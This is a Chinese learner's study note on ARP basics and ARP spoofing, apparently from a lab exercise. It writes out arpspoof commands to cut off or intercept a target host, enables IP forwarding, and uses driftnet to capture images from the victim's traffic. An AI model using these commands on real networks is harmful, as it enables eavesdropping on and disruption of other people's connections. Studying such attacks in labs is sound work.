今日所学:
- 一些关于计算机网络的基础,如计算机网络的模型,路由器,交换机,网桥的作用,各层的协议等
- ARP欺骗:复习了快要还给大学老师的内容
- ARP是地址解析协议,根据IP地址获取物理地址的一个TCP/IP协议
主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。 - arp常用命令:
arp -a或arp –g
用于查看缓存中的所有项目。-a和-g参数的结果是一样的,多年来-g一直是UNIX平台上用来显示ARP缓存中所有项目的选项,而Windows用的是arp -a(-a可被视为all,即全部的意思),但它也可以接受比较传统的-g选项。
arp -a Ip
如果有多个网卡,那么使用arp -a加上接口的IP地址,就可以只显示与该接口相关的ARP缓存项目。 - ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。
- ARP断网攻击
Arpspoof –i 网卡 -t 目标ip 网关
其中,-i后面的参数是网卡名称,-t后面的参数是目的主机和网关,截获目的主机发往网关的数据包
通过fping命令,查看当前局域网还存在那些主机,以确定要攻击的主机的ip地址。
断网攻击:arpspoof -i eth0 -t 192.168.18.130 192.168.18.254
Arp -a 查看靶机网关mac地址的变化 - 内网截获图片
Arp欺骗:目标ip的流量经过我的网卡,从网关出去。
Arp断网:目标ip的流量经过我的网卡- echo 1 >/proc/sys/net/ipv4/ip_forward
设置ip流量转发,不会出现断网现象 - 在ARP欺骗前,检查是否能够上网
- 进行ARP欺骗:arpspoof -i eth0 -t 192.168.18.102 192.168.18.254
- 因为开启了ip流量转发,所以此时win7是可以上网的
- 查看一下ARP缓存表,发现欺骗成功
- 在命令行输入:driftnet –i eth0,会出现一个小窗口,不要关闭,放大窗口
(Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序。)
- echo 1 >/proc/sys/net/ipv4/ip_forward